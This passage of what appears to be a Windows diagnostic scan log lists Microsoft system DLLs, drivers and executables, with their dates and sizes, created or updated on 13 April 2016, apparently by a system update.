2016-04-13 20:22 - 2016-04-02 05:03 - 04774912 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-04-13 20:22 - 2016-04-02 05:00 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-13 20:22 - 2016-03-29 12:23 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-04-13 20:22 - 2016-03-29 12:22 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-13 20:22 - 2016-03-29 12:22 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-13 20:22 - 2016-03-29 12:20 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-13 20:22 - 2016-03-29 12:20 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-13 20:22 - 2016-03-29 12:15 - 00100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2016-04-13 20:22 - 2016-03-29 12:11 - 00686976 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-04-13 20:22 - 2016-03-29 12:05 - 01152864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-04-13 20:22 - 2016-03-29 12:02 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-13 20:22 - 2016-03-29 12:02 - 00334736 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2016-04-13 20:22 - 2016-03-29 11:56 - 01297752 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-04-13 20:22 - 2016-03-29 11:28 - 00696664 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-04-13 20:22 - 2016-03-29 11:28 - 00535080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-04-13 20:22 - 2016-03-29 11:28 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-04-13 20:22 - 2016-03-29 11:25 - 00258912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufx01000.sys
2016-04-13 20:22 - 2016-03-29 11:25 - 00058400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.dll
2016-04-13 20:22 - 2016-03-29 11:19 - 00296488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2016-04-13 20:22 - 2016-03-29 11:18 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-04-13 20:22 - 2016-03-29 11:17 - 00300104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-04-13 20:22 - 2016-03-29 11:13 - 00986976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-04-13 20:22 - 2016-03-29 11:11 - 00605440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-13 20:22 - 2016-03-29 11:11 - 00074424 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.exe
2016-04-13 20:22 - 2016-03-29 11:10 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-04-13 20:22 - 2016-03-29 11:09 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-04-13 20:22 - 2016-03-29 11:08 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-04-13 20:22 - 2016-03-29 11:08 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-04-13 20:22 - 2016-03-29 11:07 - 00081144 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-04-13 20:22 - 2016-03-29 10:44 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-04-13 20:22 - 2016-03-29 10:44 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-04-13 20:22 - 2016-03-29 10:41 - 00051128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.dll
2016-04-13 20:22 - 2016-03-29 10:32 - 00253088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-04-13 20:22 - 2016-03-29 10:26 - 02403680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-04-13 20:22 - 2016-03-29 10:26 - 01089888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-13 20:22 - 2016-03-29 10:26 - 00073872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-04-13 20:22 - 2016-03-29 10:25 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-04-13 20:22 - 2016-03-29 10:24 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-04-13 20:22 - 2016-03-29 10:23 - 00069744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-04-13 20:22 - 2016-03-29 10:21 - 00378208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-04-13 20:22 - 2016-03-29 10:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-04-13 20:22 - 2016-03-29 10:16 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-04-13 20:22 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2016-04-13 20:22 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2016-04-13 20:22 - 2016-03-29 10:07 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-04-13 20:22 - 2016-03-29 10:07 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2016-04-13 20:22 - 2016-03-29 10:07 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsdchngr.dll
2016-04-13 20:22 - 2016-03-29 10:06 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacchooks.dll
2016-04-13 20:22 - 2016-03-29 10:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-04-13 20:22 - 2016-03-29 10:00 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-04-13 20:22 - 2016-03-29 10:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveskybackup.dll
2016-04-13 20:22 - 2016-03-29 10:00 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-04-13 20:22 - 2016-03-29 09:59 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-04-13 20:22 - 2016-03-29 09:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-04-13 20:22 - 2016-03-29 09:57 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-13 20:22 - 2016-03-29 09:57 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-04-13 20:22 - 2016-03-29 09:57 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-04-13 20:22 - 2016-03-29 09:55 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-04-13 20:22 - 2016-03-29 09:55 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-04-13 20:22 - 2016-03-29 09:55 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-04-13 20:22 - 2016-03-29 09:54 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-13 20:22 - 2016-03-29 09:54 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-04-13 20:22 - 2016-03-29 09:53 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-13 20:22 - 2016-03-29 09:52 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-04-13 20:22 - 2016-03-29 09:51 - 00181248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rfcomm.sys
2016-04-13 20:22 - 2016-03-29 09:51 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-04-13 20:22 - 2016-03-29 09:51 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-04-13 20:22 - 2016-03-29 09:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\BdeHdCfgLib.dll
2016-04-13 20:22 - 2016-03-29 09:50 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-13 20:22 - 2016-03-29 09:50 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-04-13 20:22 - 2016-03-29 09:50 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-04-13 20:22 - 2016-03-29 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2016-04-13 20:22 - 2016-03-29 09:49 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-04-13 20:22 - 2016-03-29 09:49 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-13 20:22 - 2016-03-29 09:48 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-04-13 20:22 - 2016-03-29 09:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-04-13 20:22 - 2016-03-29 09:46 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-04-13 20:22 - 2016-03-29 09:44 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFWSD.dll
2016-04-13 20:22 - 2016-03-29 09:42 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-04-13 20:22 - 2016-03-29 09:39 - 00550912 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-04-13 20:22 - 2016-03-29 09:38 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-04-13 20:22 - 2016-03-29 09:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-04-13 20:22 - 2016-03-29 09:36 - 00530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2016-04-13 20:22 - 2016-03-29 09:35 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2016-04-13 20:22 - 2016-03-29 09:35 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-04-13 20:22 - 2016-03-29 09:34 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-13 20:22 - 2016-03-29 09:34 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-04-13 20:22 - 2016-03-29 09:34 - 00333824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-04-13 20:22 - 2016-03-29 09:34 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2016-04-13 20:22 - 2016-03-29 09:33 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-04-13 20:22 - 2016-03-29 09:32 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-04-13 20:22 - 2016-03-29 09:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-04-13 20:22 - 2016-03-29 09:30 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-13 20:22 - 2016-03-29 09:30 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-13 20:22 - 2016-03-29 09:28 - 00460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-04-13 20:22 - 2016-03-29 09:27 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-04-13 20:22 - 2016-03-29 09:26 - 00169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2016-04-13 20:22 - 2016-03-29 09:23 - 00694784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-04-13 20:22 - 2016-03-29 09:23 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-04-13 20:22 - 2016-03-29 09:23 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-04-13 20:22 - 2016-03-29 09:22 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-04-13 20:22 - 2016-03-29 09:21 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-13 20:22 - 2016-03-29 09:20 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-04-13 20:22 - 2016-03-29 09:20 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-04-13 20:22 - 2016-03-29 09:20 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.V2.dll
2016-04-13 20:22 - 2016-03-29 09:20 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsdchngr.dll
2016-04-13 20:22 - 2016-03-29 09:19 - 00556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-04-13 20:22 - 2016-03-29 09:19 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacchooks.dll
2016-04-13 20:22 - 2016-03-29 09:18 - 00676352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDApi.dll
2016-04-13 20:22 - 2016-03-29 09:17 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-04-13 20:22 - 2016-03-29 09:17 - 00708608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-13 20:22 - 2016-03-29 09:17 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-04-13 20:22 - 2016-03-29 09:16 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-04-13 20:22 - 2016-03-29 09:16 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-04-13 20:22 - 2016-03-29 09:14 - 00954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-04-13 20:22 - 2016-03-29 09:14 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-04-13 20:22 - 2016-03-29 09:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-04-13 20:22 - 2016-03-29 09:13 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-04-13 20:22 - 2016-03-29 09:12 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-04-13 20:22 - 2016-03-29 09:11 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-04-13 20:22 - 2016-03-29 09:11 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-04-13 20:22 - 2016-03-29 09:11 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-04-13 20:22 - 2016-03-29 09:11 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-13 20:22 - 2016-03-29 09:11 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-04-13 20:22 - 2016-03-29 09:11 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-04-13 20:22 - 2016-03-29 09:10 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-13 20:22 - 2016-03-29 09:10 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-04-13 20:22 - 2016-03-29 09:09 - 01239552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-04-13 20:22 - 2016-03-29 09:09 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-04-13 20:22 - 2016-03-29 09:09 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2016-04-13 20:22 - 2016-03-29 09:08 - 00888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-04-13 20:22 - 2016-03-29 09:08 - 00841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-04-13 20:22 - 2016-03-29 09:08 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-13 20:22 - 2016-03-29 09:07 - 01902592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-13 20:22 - 2016-03-29 09:06 - 01575936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-04-13 20:22 - 2016-03-29 09:06 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-04-13 20:22 - 2016-03-29 09:06 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2016-04-13 20:22 - 2016-03-29 09:05 - 01395712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-04-13 20:22 - 2016-03-29 09:05 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2016-04-13 20:22 - 2016-03-29 09:04 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2016-04-13 20:22 - 2016-03-29 09:03 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-04-13 20:22 - 2016-03-29 09:02 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-04-13 20:22 - 2016-03-29 09:02 - 01211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-04-13 20:22 - 2016-03-29 09:00 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-04-13 20:22 - 2016-03-29 09:00 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-04-13 20:22 - 2016-03-29 09:00 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-13 20:22 - 2016-03-29 09:00 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-04-13 20:22 - 2016-03-29 08:59 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-04-13 20:22 - 2016-03-29 08:59 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-04-13 20:22 - 2016-03-29 08:59 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-04-13 20:22 - 2016-03-29 08:56 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-04-13 20:22 - 2016-03-29 08:56 - 00415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-04-13 20:22 - 2016-03-29 08:55 - 01052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.dll
2016-04-13 20:22 - 2016-03-29 08:53 - 00323072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-04-13 20:22 - 2016-03-29 08:53 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-04-13 20:22 - 2016-03-29 08:52 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-13 20:22 - 2016-03-29 08:52 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\easwrt.dll
2016-04-13 20:22 - 2016-03-29 08:49 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-04-13 20:22 - 2016-03-29 08:48 - 00346624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-04-13 20:22 - 2016-03-29 08:44 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-04-13 20:22 - 2016-03-29 08:43 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AccountsRt.dll
2016-04-13 20:22 - 2016-03-29 08:42 - 01410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-04-13 20:22 - 2016-03-29 08:42 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-13 20:22 - 2016-03-29 08:41 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-04-13 20:22 - 2016-03-29 08:40 - 00787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-04-13 20:22 - 2016-03-29 08:39 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSDApi.dll
2016-04-13 20:22 - 2016-03-29 08:39 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-13 20:22 - 2016-03-29 08:39 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-04-13 20:22 - 2016-03-29 08:38 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-04-13 20:22 - 2016-03-29 08:36 - 03351040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-13 20:22 - 2016-03-29 08:36 - 00649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-04-13 20:22 - 2016-03-29 08:35 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-04-13 20:22 - 2016-03-29 08:34 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-04-13 20:22 - 2016-03-29 08:34 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-04-13 20:22 - 2016-03-29 08:34 - 00682496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-04-13 20:22 - 2016-03-29 08:34 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 01588224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 01098240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 00854528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-04-13 20:22 - 2016-03-29 08:32 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2016-04-13 20:22 - 2016-03-29 08:31 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-04-13 20:22 - 2016-03-29 08:31 - 01117184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-04-13 20:22 - 2016-03-29 08:31 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-04-13 20:22 - 2016-03-29 08:30 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-04-13 20:22 - 2016-03-29 08:29 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-04-13 20:22 - 2016-03-29 08:29 - 00256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-04-13 20:22 - 2016-03-29 08:28 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-04-13 20:22 - 2016-03-29 08:28 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-04-13 20:22 - 2016-03-29 08:27 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-04-13 20:22 - 2016-03-29 08:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-04-13 20:22 - 2016-03-29 08:27 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-04-13 20:22 - 2016-03-29 08:27 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-04-13 20:22 - 2016-03-29 08:27 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-04-13 20:22 - 2016-03-29 08:23 - 00777728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsSpellCheckingFacility.dll
2016-04-13 20:22 - 2016-03-29 08:22 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-04-13 20:22 - 2016-03-29 08:19 - 02635776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-04-13 20:22 - 2016-03-29 08:17 - 00765952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-04-13 20:22 - 2016-03-29 08:14 - 01072128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-04-13 20:22 - 2016-03-29 08:13 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-04-13 20:22 - 2016-03-29 08:10 - 03671040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-13 20:22 - 2016-03-29 08:06 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-04-13 20:22 - 2016-03-29 08:05 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-04-13 20:22 - 2016-03-29 08:05 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-04-13 20:22 - 2016-03-29 08:05 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-04-13 20:22 - 2016-03-29 08:05 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-04-13 20:22 - 2016-03-29 08:04 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-13 20:22 - 2016-03-29 08:04 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-04-13 20:22 - 2016-03-29 08:01 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-04-13 20:22 - 2016-03-29 08:01 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2016-04-13 20:22 - 2016-03-29 08:00 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-04-13 20:22 - 2016-03-29 07:58 - 01799680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-04-13 20:22 - 2016-03-29 07:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-04-13 20:22 - 2016-03-29 07:51 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
